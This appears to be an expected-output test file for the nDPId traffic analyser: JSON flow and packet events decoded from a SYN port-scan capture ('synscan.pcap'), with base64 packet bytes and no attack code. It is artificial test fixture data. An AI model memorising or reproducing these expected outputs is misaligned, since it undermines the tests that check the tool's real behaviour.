+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":959,"source":"synscan.pcap","alias":"nDPId-test","flow_id":950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":705,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":959,"source":"synscan.pcap","alias":"nDPId-test","flow_id":950,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/WEAADMGGBGsEAAIQA2GNIzSAsHdUoMYAAAAAGACEAAlzgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":960,"source":"synscan.pcap","alias":"nDPId-test","flow_id":951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":960,"source":"synscan.pcap","alias":"nDPId-test","flow_id":951,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ38AADoGpvOsEAAIQA2GNIzSB9ndUoMYAAAAAGACDAAktgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":961,"source":"synscan.pcap","alias":"nDPId-test","flow_id":952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64680,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":961,"source":"synscan.pcap","alias":"nDPId-test","flow_id":952,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAs5XcAADsGJ\/usEAAIQA2GNIzS\/KjdUoMYAAAAAGACEAAr5gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":962,"source":"synscan.pcap","alias":"nDPId-test","flow_id":953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":962,"source":"synscan.pcap","alias":"nDPId-test","flow_id":953,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAsxY4AADgGSuSsEAAIQA2GNIzSRrXdUoMYAAAAAGACBADt2QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":963,"source":"synscan.pcap","alias":"nDPId-test","flow_id":954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49158,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":963,"source":"synscan.pcap","alias":"nDPId-test","flow_id":954,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAsdRAAADYGnWKsEAAIQA2GNIzSwAbdUoMYAAAAAGACDABsiAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":964,"source":"synscan.pcap","alias":"nDPId-test","flow_id":955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":964,"source":"synscan.pcap","alias":"nDPId-test","flow_id":955,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAsie4AADMGi4SsEAAIQA2GNIzSD4PdUoMYAAAAAGACEAAZDAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":965,"source":"synscan.pcap","alias":"nDPId-test","flow_id":956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":965,"source":"synscan.pcap","alias":"nDPId-test","flow_id":956,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAsUTQAADcGwD6sEAAIQA2GNIzSGiHdUoMYAAAAAGACEAAObgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":966,"source":"synscan.pcap","alias":"nDPId-test","flow_id":957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":966,"source":"synscan.pcap","alias":"nDPId-test","flow_id":957,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsHoUAADMG9u2sEAAIQA2GNIzTEcbdU4MZAAAAAGACEAAWxgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":967,"source":"synscan.pcap","alias":"nDPId-test","flow_id":958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5989,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":967,"source":"synscan.pcap","alias":"nDPId-test","flow_id":958,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAs7fQAAC4GLH6sEAAIQA2GNIzTF2XdU4MZAAAAAGACDAAVJwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":968,"source":"synscan.pcap","alias":"nDPId-test","flow_id":959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":968,"source":"synscan.pcap","alias":"nDPId-test","flow_id":959,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsqdoAADQGapisEAAIQA2GNIzTBEXdU4MZAAAAAGACBAAwRwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":969,"source":"synscan.pcap","alias":"nDPId-test","flow_id":960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":969,"source":"synscan.pcap","alias":"nDPId-test","flow_id":960,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAs5xkAADoGJ1msEAAIQA2GNIzTCindU4MZAAAAAGACDAAiYwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":970,"source":"synscan.pcap","alias":"nDPId-test","flow_id":961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"synscan.pcap","alias":"nDPId-test","flow_id":961,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsY4kAADIGsumsEAAIQA2GNIzTA+rdU4MZAAAAAGACDAAoogAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":971,"source":"synscan.pcap","alias":"nDPId-test","flow_id":962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"synscan.pcap","alias":"nDPId-test","flow_id":962,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsMEoAADMG5SisEAAIQA2GNIzTB9TdU4MZAAAAAGACEAAguAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":972,"source":"synscan.pcap","alias":"nDPId-test","flow_id":963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":972,"source":"synscan.pcap","alias":"nDPId-test","flow_id":963,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAs9IQAACgGK+6sEAAIQA2GNIzTAiHdU4MZAAAAAGACBAAyawAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":973,"source":"synscan.pcap","alias":"nDPId-test","flow_id":964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"synscan.pcap","alias":"nDPId-test","flow_id":964,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsPqUAACkG4M2sEAAIQA2GNIzTBBvdU4MZAAAAAGACCAAscQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":974,"source":"synscan.pcap","alias":"nDPId-test","flow_id":965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3659,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"synscan.pcap","alias":"nDPId-test","flow_id":965,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAs0uwAACgGTYasEAAIQA2GNIzTDkvdU4MZAAAAAGACBAAmQQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":975,"source":"synscan.pcap","alias":"nDPId-test","flow_id":966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"synscan.pcap","alias":"nDPId-test","flow_id":966,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsk78AADoGerOsEAAIQA2GNIzTE8TdU4MZAAAAAGACDAAYyAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":976,"source":"synscan.pcap","alias":"nDPId-test","flow_id":967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"synscan.pcap","alias":"nDPId-test","flow_id":967,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsgW4AADIGlQSsEAAIQA2GNIzTRnjdU4MZAAAAAGACDADmEwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":977,"source":"synscan.pcap","alias":"nDPId-test","flow_id":968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":977,"source":"synscan.pcap","alias":"nDPId-test","flow_id":968,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsvXkAACYGZPmsEAAIQA2GNIzTFADdU4MZAAAAAGACDAAYjAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":978,"source":"synscan.pcap","alias":"nDPId-test","flow_id":969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"synscan.pcap","alias":"nDPId-test","flow_id":969,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsehoAADYGmFisEAAIQA2GNIzTAfTdU4MZAAAAAGACDAAqmAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":979,"source":"synscan.pcap","alias":"nDPId-test","flow_id":970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"synscan.pcap","alias":"nDPId-test","flow_id":970,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAs6wMAACUGOG+sEAAIQA2GNIzThwvdU4MZAAAAAGACCACpgAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":980,"source":"synscan.pcap","alias":"nDPId-test","flow_id":971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6881,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"synscan.pcap","alias":"nDPId-test","flow_id":971,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsJQUAADgG622sEAAIQA2GNIzTGuHdU4MZAAAAAGACBAAZqwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":981,"source":"synscan.pcap","alias":"nDPId-test","flow_id":972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":981,"source":"synscan.pcap","alias":"nDPId-test","flow_id":972,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsQ0wAADYGzyasEAAIQA2GNIzTA4LdU4MZAAAAAGACDAApCgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":982,"source":"synscan.pcap","alias":"nDPId-test","flow_id":973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1164,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":982,"source":"synscan.pcap","alias":"nDPId-test","flow_id":973,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsO3sAADAG3PesEAAIQA2GNIzTBIzdU4MZAAAAAGACBAAwAAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":983,"source":"synscan.pcap","alias":"nDPId-test","flow_id":974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":983,"source":"synscan.pcap","alias":"nDPId-test","flow_id":974,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsDxoAAC0GDFmsEAAIQA2GNIzTH0rdU4MZAAAAAGACCAARQgAAAgQFtA=="} 